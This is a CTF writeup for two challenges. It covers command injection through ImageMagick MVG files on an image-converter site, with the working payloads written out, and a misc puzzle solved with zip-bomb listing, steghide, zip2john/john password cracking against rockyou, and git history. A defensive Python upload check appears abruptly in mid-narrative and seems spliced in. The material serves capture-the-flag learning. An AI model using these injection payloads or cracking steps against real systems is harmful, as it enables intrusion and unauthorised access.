RVCExIITB CTF 2024 | CTF WRITEUP | WEB

1. WEB/Transformer

2. MISC/RAW

Category : Web

1) Transformer

I don't really trust other websites with my media files. So, I created my own website which allows you to transform your images from one format to another. The website also has a functionality where you can resize your image files to any size that you want (based on your preferred width and height).

Check it out... It's really cool!

http://rvcechalls.xyz:7255/

Description

The task is to exploit the Remote Code Execution (RCE) vulnerability in the image converter program.

Solution

We are given this web page,



We have two file upload sections here: the first converts the image to another format and the second resizes it.

After we upload, we are shown this page,

When we click the button, we can download the photo in the converted or resized format.

Let's upload a file and intercept the request in Burp to learn how the server responds.

A very typical request and response, with no errors.

Let's try to upload a PHP file.

We get an error in the response.

I tried the usual file upload bypass techniques. Nothing worked. Then I searched the given error in ChatGPT to see what the error means.

It turns out the error is from a program called ImageMagick. A quick Google search led me to this link: https://book.jorianwoltjer.com/web/imagemagick

I found this payload:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://localhost/`id > /tmp/pwned`'
pop graphic-context

Now if I send this payload in the first request and then the following payload in the second request, I can view the result of the command executed.

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://localhost/`cat /tmp/pwned`'
pop graphic-context

The payload as it is did not work, so I also used this command from the site,

https://example.com"|bash -c "id > /tmp/pwned' output.png

Making the final payload:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://localhost"|bash -c "ls > /tmp/pwned' output.png'
pop graphic-context

And the payload to view the result of the executed command:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://localhost"|bash -c "cat /tmp/pwned' output.png'
pop graphic-context

With these we got the following response:

We can see the list of files in the current directory.
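The converter above hands whatever was uploaded to ImageMagick, which chooses a decoder from the file's content rather than its extension, so an MVG script named photo.png is still parsed as MVG and its image-over URL is passed to a delegate. The check below is an added example (not code from the writeup or the challenge) showing how an upload handler can reject such inputs by verifying the magic bytes of the declared raster format; the samples, including the writeup's own payload, are constructed inline.

```python
"""Added example: reject MVG/SVG text disguised as a raster upload before
it reaches ImageMagick. Constructed samples only; not the challenge code."""
import re

# Magic bytes of the raster formats the converter is meant to accept.
RASTER_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# MVG directives that identify a vector script, and the "image over ... 'url'"
# form that makes ImageMagick fetch a resource through a delegate program.
MVG_DIRECTIVE = re.compile(rb"^\s*(push graphic-context|viewbox|image\s+over)",
                           re.I | re.M)
DELEGATE_URL = re.compile(rb"image\s+over\s+[\d,\s]+'(https?://[^']*)'", re.I)


def classify_upload(data: bytes, declared: str) -> str:
    """Return 'ok' only if data really is the declared raster format;
    otherwise a short reason the upload handler can log and refuse."""
    magics = RASTER_MAGIC.get(declared.lower())
    if magics is None:
        return "unsupported-format"
    if any(data.startswith(m) for m in magics):
        return "ok"
    head = data[:512]
    if MVG_DIRECTIVE.search(head) or head.lstrip().startswith(b"<svg"):
        return "vector-script"  # MVG/SVG text, not a raster image
    return "magic-mismatch"


def delegate_urls(data: bytes) -> list:
    """URLs an MVG 'image over' directive would make ImageMagick fetch.
    Useful for logging what a rejected upload was trying to reach; for the
    writeup's payload the 'URL' visibly carries a shell fragment."""
    return [m.decode("latin-1") for m in DELEGATE_URL.findall(data)]


# Constructed samples: a genuine PNG header and the MVG payload from the writeup.
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
MVG_PAYLOAD = (b"push graphic-context\nviewbox 0 0 640 480\n"
               b"image over 0,0 0,0 'https://localhost\"|bash -c \"ls > /tmp/pwned' output.png'\n"
               b"pop graphic-context\n")
```

Pair this with an ImageMagick policy.xml that disables the MVG, MSL, URL and HTTPS coders, since the magic-byte check only covers formats the converter declares.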

Now with this command injection, we just need to move around and find the flag.

We find the flag file in the / directory.

Just print the flag now.


flag{7h3_Tr461ckk_5t0ry_0f_mR_Im4g3_Ma61cKk_3c0b9c0b12f1}

Category: Misc

1) RAW

Your task is to unravel the covert message concealed by a RAW agent. Delve into intercepted communications, analyze an ocean of datadump and decipher the hidden codes to unveil the critical intelligence intended for Indian counterparts. Can you crack the code and reveal the clandestine message? 

Given: Ocean.zip

Solution

Let's unzip the given zip file.

unzip Ocean.zip

No way!!!... It's a zip bomb, so it's no use unzipping it like this.

So let's list the files in the zip file and their info,

7z l Ocean.zip


We can see a lot of files of size 21 and 0, so we can just filter those out (size is the fourth column of the 7z listing).

7z l Ocean.zip | awk '$4 != 21 && $4 != 0'

Let's extract only these files from the zip file with the following command:

7z x Ocean.zip Ocean/chall169/file69 Ocean/chall213/file158 Ocean/chall300/file104 Ocean/chall348/file106 Ocean/chall405/file39 Ocean/chall405/file52 Ocean/chall439/file449 Ocean/chall461/file108

After extracting, we go through the files and find a Google Drive link.

Sign in and download these two files.

Open the doc file in any docx viewer (I used Google Docs itself). Select the whole file content with CTRL + A and we find a secret key.

KEY - keyishidd3n

I guess this is to use steghide on the given image.

steghide --extract -sf transmission.jpg


We get a secret.txt file; cat it out.

We get this file path:

/d/1hK3tV5PPtdOwUujHOqQOgl1NI015GpNU/

(We had no idea what to do with this for a while and my teammate came up with this way somehow)

https://drive.google.com/uc?id=1hK3tV5PPtdOwUujHOqQOgl1NI015GpNU

When we load this link a zip file is downloaded: agentnotebook.zip

Trying to unzip it shows that it is encrypted with a password.

So we use zip2john to convert it to a hash we can crack.

sudo zip2john agentnotebook.zip > hash

Now we use john to crack the password.

sudo john hash --format=ZIP --wordlist=/usr/share/wordlists/rockyou.txt

topgun is the password.

Unzip the zip file using the following command.

7z x agentnotebook.zip

After unzipping, go to the agentnotebook folder and cat important.txt


HISTORY in all caps means it has something to do with the history of this folder.

Let's list all hidden files too,

ls -la

There is a .git directory, so time to use some git skills.

Use the git log command to list all commits:

git log

Use this command to go to the previous commit.

git reset --hard HEAD^

Keep doing the same until you get the full flag.

flag{th3_j0urn3y_t0_b3_a_R4W_ageNt_i5_n0T_aN_ea5Y_on3}

Check out my teammate's blog for Forensics/Operation Woofenstein

Stay Curious......Keep Learning......!!!!

Happy Hacking!!!!!!
